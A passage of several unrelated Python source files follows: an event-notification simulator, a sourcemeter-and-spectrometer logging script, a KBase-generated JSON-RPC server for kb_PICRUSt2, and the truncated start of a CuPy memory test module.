log.trace("RESPONSE: %s, %s, %s", response.status, response.reason, data)
except Exception as e:
# the actual listener is no longer there; just log a message
log.warn("event notification HTTP request failed: %r: %s", url, e)
finally:
if conn:
conn.close()
class EventGenerator(object):
"""
Simple helper to generate and trigger event notifications.
"""
def __init__(self, notifier, events_filename=None):
self._notifier = notifier
self._events = None
if events_filename:
try:
with open(events_filename, 'r') as f:
log.info('loading events from: %s', events_filename)
pyobj = yaml.load(f)
self._events = [dict(obj) for obj in pyobj]
except Exception as ex:
log.warn('could not load events from %s. Continuing with '
'hard-coded event', events_filename)
self._keep_running = True
self._index = 0 # in EventInfo.EVENT_TYPES or self._events
# self._runnable set depending on whether we're under pyon or not
if 'pyon' in sys.modules:
from gevent import Greenlet
self._runnable = Greenlet(self._run)
log.debug("!!!! EventGenerator: pyon detected: using Greenlet")
else:
from threading import Thread
self._runnable = Thread(target=self._run)
self._runnable.setDaemon(True)
log.debug("!!!! EventGenerator: pyon not detected: using Thread")
def generate_and_notify_event(self):
if self._events:
if self._index >= len(self._events):
self._index = 0
event = self._events[self._index]
self._index += 1
event_id = event['event_id']
platform_id = event['platform_id']
message = event.get('message', "%s's message" % event_id)
group = event.get('group', '')
severity = event.get('severity', 3)
else:
if self._index >= len(EventInfo.EVENT_TYPES):
self._index = 0
event_type = EventInfo.EVENT_TYPES.values()[self._index]
self._index += 1
event_id = "TODO_some_event_id"
platform_id = "TODO_some_platform_id"
message = "%s (synthetic event generated from simulator)" % event_type['name']
group = event_type['group']
severity = event_type['severity']
timestamp = ntplib.system_to_ntp_time(time.time())
first_time_timestamp = timestamp
event_instance = {
'event_id': event_id,
'message': message,
'platform_id': platform_id,
'timestamp': timestamp,
'first_time_timestamp': first_time_timestamp,
'severity': severity,
'group': group,
}
log.debug("notifying event_instance=%s", str(event_instance))
self._notifier.notify(event_instance)
def start(self):
self._runnable.start()
def _run(self):
sleep(3) # wait a bit before first event
while self._keep_running:
self.generate_and_notify_event()
# sleep for a few secs regularly checking we still are running
secs = 7
while self._keep_running and secs > 0:
sleep(0.3)
secs -= 0.3
log.trace("event generation stopped.")
def stop(self):
log.trace("stopping event generation...")
self._keep_running = False
if __name__ == "__main__": # pragma: no cover
#
# first, call this demo program with command line argument 'listener',
# then, on a second terminal, with argument 'notifier'
#
host, port = "localhost", 8000
if len(sys.argv) > 1 and sys.argv[1] == "listener":
# run listener
from gevent.pywsgi import WSGIServer
def application(environ, start_response):
#print('listener got environ=%s' % str(environ))
print(" ".join(('%s=%s' % (k, environ[k])) for k in [
'CONTENT_LENGTH','CONTENT_TYPE', 'HTTP_ACCEPT']))
input = environ['wsgi.input']
body = "".join(input.readlines())
print('body=\n%s' % body)
#
# note: the expected content format is JSON and we can in general
# parse with either json or yaml ("every JSON file is also a valid
# YAML file" -- http://yaml.org/spec/1.2/spec.html#id2759572):
#
event_instance = yaml.load(body)
print('event_instance=%s' % str(event_instance))
# respond OK:
headers = [('Content-Type', 'text/plain') ]
status = '200 OK'
start_response(status, headers)
return "MY-RESPONSE. BYE"
print("%s:%s: listening for event notifications..." % (host, port))
WSGIServer((host, port), application).serve_forever()
elif len(sys.argv) > 1 and sys.argv[1] == "notifier":
# run notifier
notifier = EventNotifier()
url = "http://%s:%s" % (host, port)
for event_type in EventInfo.EVENT_TYPES.keys():
notifier.add_listener(url, event_type)
print("registered listener to event_type=%r" % event_type)
generator = EventGenerator(notifier)
secs = 15
print("generating events for %s seconds ..." % secs)
generator.start()
sleep(secs)
generator.stop()
else:
print("usage: call me with arg 'listener' or 'notifier'")
"""
Test program
TERMINAL 1:
$ bin/python ion/agents/platform/rsn/simulator/oms_events.py listener
localhost:8000: listening for event notifications...
TERMINAL 2:
$ bin/python ion/agents/platform/rsn/simulator/oms_events.py notifier
oms_simulator: setting log level to: logging.WARN
registered listener to event_type='ALL'
generating events for 15 seconds ...
TERMINAL 1:
CONTENT_LENGTH=270 CONTENT_TYPE=application/json HTTP_ACCEPT=text/plain
body=
{
"group": "power",
"severity": 3,
"url": "http://localhost:8000",
"timestamp": 3578265811.422655,
"platform_id": "TODO_some_platform_id",
"message": "on battery (synthetic event generated from simulator)",
"first_time_timestamp": 3578265811.422655
}
event_instance={'platform_id': 'TODO_some_platform_id', 'group': 'power', 'severity': 3, 'url': 'http://localhost:8000', 'timestamp': 3578265811.422655, 'message': 'on battery (synthetic event generated from simulator)', 'first_time_timestamp': 3578265811.422655}
127.0.0.1 - - [2013-05-22 19:43:31] "POST / HTTP/1.1" 200 118 0.002814
CONTENT_LENGTH=270 CONTENT_TYPE=application/json HTTP_ACCEPT=text/plain
body=
{
"group": "power",
"severity": 3,
"url": "http://localhost:8000",
"timestamp": 3578265818.647295,
"platform_id": "TODO_some_platform_id",
"message": "on battery (synthetic event generated from simulator)",
"first_time_timestamp": 3578265818.647295
}
event_instance={'platform_id': 'TODO_some_platform_id', 'group': 'power', 'severity': 3, 'url': 'http://localhost:8000', 'timestamp': 3578265818.647295, 'message': 'on battery (synthetic event generated from simulator)', 'first_time_timestamp': 3578265818.647295}
127.0.0.1 - - [2013-05-22 19:43:38] "POST / HTTP/1.1" 200 118 0.003455
"""
|
tasks.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 24 10:37:57 2020
@author: OPEGLAB
"""
# coding: utf-8
# Library that depends on the pyLab library and that contains the main program/functions
# for driving the LEC devices in different modes.
import numpy as np
from time import sleep, time
from pyInstruments.instruments import keithley24XX # This the module I created
import datetime
import os
from collections import deque
from pyGonioSpectrometer.instrumentation import SpectraMeasurement, list_spectrometers
from pyvisa import ResourceManager
from threading import Thread
def dt_calc(etime):
    """Returns a sampling interval (in seconds) that increases as the elapsed time etime increases."""
if etime <= 60:
return 5
elif etime <= 300:
return 10
elif etime <= 600:
return 30
elif etime <= 3600:
return 60
else:
return 300
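# Summary of the back-off schedule above, for reference:
#   elapsed time <= 60 s   -> sample every 5 s
#   elapsed time <= 300 s  -> every 10 s
#   elapsed time <= 600 s  -> every 30 s
#   elapsed time <= 3600 s -> every 60 s
#   longer runs            -> every 300 s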
class IVL_LoggerTask(object):
def __init__(self, sourcemeter = None, spectrometer = None, integration_time = 100, n_spectra = 1, folder = '.\\', filename = 'voltage-spectra-time-data',\
mode = 'CC', term = 'FRONT', fw = False, beeper = True, cmpl = 21.0, Ncount = 1,\
aver = False, nplc = 1.0, config_flag = True):
"""
Parameters
----------
sourcemeter : str, optional
            The resource name for the Keithley24XX sourcemeter. The default is None.
spectrometer : seabreeze.spectrometers.Spectrometer class, optional
The resource name for the spectrometer. The default is None.
integration_time : int or float, optional
Sets the integration time in ms. The default is 100.
n_spectra : int, optional
Number of spectra that will be averaged when using the method get_averaged_spectra(). The default is 1.
folder : str, optional
            Folder where to save the data, absolute or relative. The default is '.\'.
        filename : str, optional
            Filename where to save the data. Always append if the file already exists. The default is 'voltage-spectra-time-data'.
mode : str, optional
Input 'CC' or 'CV' for constant current/voltage modes. The default is 'CC'.
term : str, optional
Output terminal for the Keithley, only 'FRONT' or 'REAR' is accepted. The default is 'FRONT'.
fw : bool, optional
Activate the four-wire measurement. The default is False.
beeper : bool, optional
Activate the beeper. The default is True.
cmpl : float, optional
Compliance for the sourcemeter (either in V or A, depending on the mode). The default is 21.0.
Ncount : int, optional
Number of samples to ask the sourcemeter. The default is 1.
aver : bool, optional
Whether to average the number of samples given for Ncount. The default is False.
nplc : float, optional
            Number of power line cycles (NPLC) to integrate over. The default is 1.0.
config_flag : bool, optional
            Whether or not to configure the sourcemeter. The default is True.
Returns
-------
None.
"""
self.max_length = 500
self.time = deque([], self.max_length )
self.voltage = deque([], self.max_length )
self.intensity = deque([], self.max_length )
self.sourcemeter = sourcemeter
self.spectrometer = spectrometer
self.folder = folder
self.filename = filename
self.mode = mode
self.configuration = dict(term = term, fw = fw, beeper = beeper, cmpl = cmpl, Ncount = Ncount, aver = aver, nplc = nplc)
self.configuration_spectrometer = dict(integration_time = integration_time, n_spectra = n_spectra)
self.config_flag = config_flag
self.value = 0.00
self.min_counts_allowed = 10000
def configurate(self):
"""
        Configures the instrument and powers it on.
"""
# Opening the sourcemeter only done if not done before
        if self.sourcemeter is None:
            raise ValueError('The sourcemeter resource has not been defined. Please define it through the sourcemeter attribute')
self.keithley = keithley24XX(self.sourcemeter)
if self.config_flag:
if self.mode == 'CC':
print('INFO: Instrument configured in CC mode.')
self.keithley.mode_ifix_configure(**self.configuration)
elif self.mode == 'CV':
print('INFO: Instrument configured in CV mode.')
self.keithley.mode_vfix_configure(**self.configuration)
else:
raise ValueError('ERROR: Configuration mode not known! Only CC or CV allowed')
# Opening the spectrometer only done if not done before
        if self.spectrometer is None:
            raise ValueError('The spectrometer resource has not been defined. Please define it through the spectrometer attribute')
self.flame = SpectraMeasurement(self.spectrometer, **self.configuration_spectrometer)
self.wavelengths = self.flame.get_wavelengths()
def run(self, value, runtime = np.inf):
"""
Parameters
----------
value : float
Current (in mA) or voltage (V) setpoint value.
runtime : float, optional
Running time of the experiment in seconds. The default is np.inf.
        Notes
        -----
        The time interval between measurements is determined internally by dt_calc().
"""
############ LOGGING THE DATA ###################################
# Opening the file to save the data
self.filename = os.path.join(self.folder, self.filename + f'_{self.flame.integration_time/1000:.0f}ms.txt')
if not os.path.isfile(self.filename):
with open(self.filename,'a') as f:
f.write(('# '+ 5*'{:^12}\t' + '\n').format('EllapsedTime','Current','Voltage', 'Integration Time', 'Spectra'))
f.write(('# '+ 5*'{:^12}\t' + '\n').format('s','mA', 'V', 'ms','counts'))
# Saving the wavelength vector
self.write2file(np.nan, np.nan, np.nan, np.nan, self.wavelengths)
# Taking and saving the dark spectra
tspectra = self.flame.get_averaged_intensities()
            # Saving the dark spectra
self.write2file(np.nan, np.nan, np.nan, self.flame.integration_time / 1000, tspectra)
print('Current value: ', value)
if self.mode == 'CC':
self.keithley.mode_ifix_setcurr(value / 1000.0, curr_max = 0.1, curr_min= 0.00)
else:
self.keithley.mode_vfix_setvolt(value)
ttime = 0.0
        etime = 0.0  # Elapsed time
itime = time() # Initial time
i = 0 # Step counter
print('# Measurement started')
self.keithley.outpon()
self.running = True
while etime < runtime and self.running:
try:
time1 = time()
[mvoltage, mcurrent, _ , ttime, _ ] = self.keithley.read()
tspectra = self.flame.get_averaged_intensities()
etime = time() - itime
self.write2file(etime, mcurrent*1000.0, mvoltage, self.flame.integration_time / 1000, tspectra)
                print(f'\r #{i+1:2d}, elapsed time = {etime:.1f} s, V = {mvoltage:.2f} V, I = {mcurrent*1000:.2f} mA', end = '')
# Check for any values higher than saturation
if np.any(tspectra > self.flame.saturation_counts):
print('\n! WARNING: Some values are saturating. Consider lowering the integration time.')
elif tspectra.max() < self.min_counts_allowed:
print('\n! WARNING: The max. count is less than 10000. Consider increasing the integration time')
i += 1
self.time.append(datetime.datetime.now())
self.intensity.append(mcurrent)
self.voltage.append(mvoltage)
self.spectra = tspectra
if self.value != value:
value = self.value
if self.mode == 'CC':
self.keithley.mode_ifix_setcurr(self.value / 1000.0,curr_max=0.1, curr_min= 0.00)
else:
self.keithley.mode_vfix_setvolt(self.value)
sleeping_time = dt_calc(etime)
                while ((time() - time1) < sleeping_time) and self.running:
sleep(0.01)
except KeyboardInterrupt:
# In case of error turn off the source anyway and stop the program
                print('INFO: Program interrupted in a safe way\n')
break
except Exception as e:
# In case of ANY error turn off the source anyway and stop the program while printing the error
print(e)
break
# self.keithley.outpoff()
self.flame.close()
def measurement_on(self):
self.running = True
def measurement_off(self):
self.running = False
def write2file(self, etime, current, voltage, integration_time, data):
"""
Write to a file
"""
t = np.hstack((etime, current, voltage, integration_time, data))
t = t.reshape((1, t.shape[0]))
with open(self.filename, 'a') as f:
np.savetxt(f, t, fmt = '%8.6g')
if __name__ == '__main__':
    # This will only be executed if the script is run directly, not if it is imported as a module
lspectrometers = list_spectrometers()
spectrometer = None if len(lspectrometers) == 0 else lspectrometers[0]
print(f'Spectrometer: {spectrometer}')
# Assuming there is only one spectrometer, so taking the first element
list_of_resources = ResourceManager().list_resources()
default_resource = [s for s in list_of_resources if 'GPIB' in s]
sourcemeter = None if len(default_resource) == 0 else default_resource[0]
print(f'Sourcemeter: {sourcemeter}')
integration_time =200
n_spectra = 1
folder = r'C:\Users\JOANRR\Documents\Python Scripts\data\Etienne'
filename = 'graphene_device02'
m = IVL_LoggerTask(sourcemeter=sourcemeter, spectrometer=spectrometer, integration_time=integration_time, n_spectra=n_spectra, folder = folder, filename = filename)
intensity = 1.0 #mA
m.config_flag = False
m.configuration['term'] = 'FRONT'
m.configuration['cmpl'] = 51
m.value = intensity
m.configurate()
print('Press Ctrl+C to interrupt the measurement')
thread = Thread(target = m.run, args = (intensity, ))
thread.daemon = True
thread.start()
|
kb_PICRUSt2Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_PICRUSt2.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_PICRUSt2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_PICRUSt2.kb_PICRUSt2Impl import kb_PICRUSt2 # noqa @IgnorePep8
impl_kb_PICRUSt2 = kb_PICRUSt2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_PICRUSt2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_PICRUSt2.run_picrust2_pipeline,
name='kb_PICRUSt2.run_picrust2_pipeline',
types=[dict])
self.method_authentication['kb_PICRUSt2.run_picrust2_pipeline'] = 'required' # noqa
self.rpc_service.add(impl_kb_PICRUSt2.status,
name='kb_PICRUSt2.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_PICRUSt2 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service listening on
# port 9999 (the default), execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
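# Illustrative helper (an assumption, not part of the generated KBase template):
# one way start_server()/stop_server() could be driven from test code. The JSON-RPC
# payload targets the kb_PICRUSt2.status method registered above and assumes it
# takes no positional parameters.
def _example_start_stop(host='localhost'):
    port = start_server(host=host, port=0, newprocess=True)
    try:
        payload = {'version': '1.1', 'id': '1',
                   'method': 'kb_PICRUSt2.status', 'params': []}
        resp = _requests.post('http://%s:%s' % (host, port),
                              data=json.dumps(payload), timeout=30)
        return resp.json()
    finally:
        stop_server()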
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
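# Illustrative note: process_async_cli() above expects the input file to hold a
# single JSON-RPC call, for example
#   {"version": "1.1", "id": "1", "method": "kb_PICRUSt2.status", "params": []}
# and writes the JSON-RPC response (or error object) to the given output path.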
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_memory.py
|
import ctypes
import gc
import pickle
import threading
import unittest
import fastrlock
import pytest
import cupy.cuda
from cupy.cuda import device
from cupy.cuda import memory
from cupy.cuda import stream as stream_module
from cupy import testing
class MockMemory(memory.Memory):
cur_ptr = 1
def __init__(self, size):
self.ptr = MockMemory.cur_ptr
MockMemory.cur_ptr += size
self.size = size
self.device_id = 0
def __del__(self):
self.ptr = 0
pass
def mock_alloc(size):
mem = MockMemory(size)
return memory.MemoryPointer(mem, 0)
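# Note added for clarity (not part of the original test suite): MockMemory hands out
# fake, monotonically increasing "pointers" so that the chunk/pool bookkeeping below
# can be exercised without real GPU allocations. For instance:
#
#     base = MockMemory.cur_ptr
#     ptr = mock_alloc(16)      # MemoryPointer backed by a MockMemory of size 16
#     assert int(ptr) == base and MockMemory.cur_ptr == base + 16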
class TestUnownedMemoryClass(unittest.TestCase):
def test_inherits_base_memory(self):
assert issubclass(memory.UnownedMemory, memory.BaseMemory)
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed, memory.malloc_async],
'specify_device_id': [True, False],
}))
@testing.gpu
class TestUnownedMemory(unittest.TestCase):
def check(self, device_id):
if cupy.cuda.runtime.is_hip:
if self.allocator is memory.malloc_managed:
if cupy.cuda.driver.get_build_version() < 40300000:
raise unittest.SkipTest(
'Managed memory requires ROCm 4.3+')
else:
raise unittest.SkipTest(
'hipPointerGetAttributes does not support managed '
'memory')
if self.allocator is memory.malloc_async:
raise unittest.SkipTest('HIP does not support async mempool')
else:
if cupy.cuda.driver._is_cuda_python():
version = cupy.cuda.runtime.runtimeGetVersion()
else:
version = cupy.cuda.driver.get_build_version()
if version < 11020:
raise unittest.SkipTest('malloc_async is supported since '
'CUDA 11.2')
size = 24
shape = (2, 3)
dtype = cupy.float32
with device.Device(device_id):
src_mem_ptr = self.allocator(size)
src_ptr = src_mem_ptr.ptr
args = (src_ptr, size, src_mem_ptr)
kwargs = {}
if self.specify_device_id:
kwargs = {'device_id': device_id}
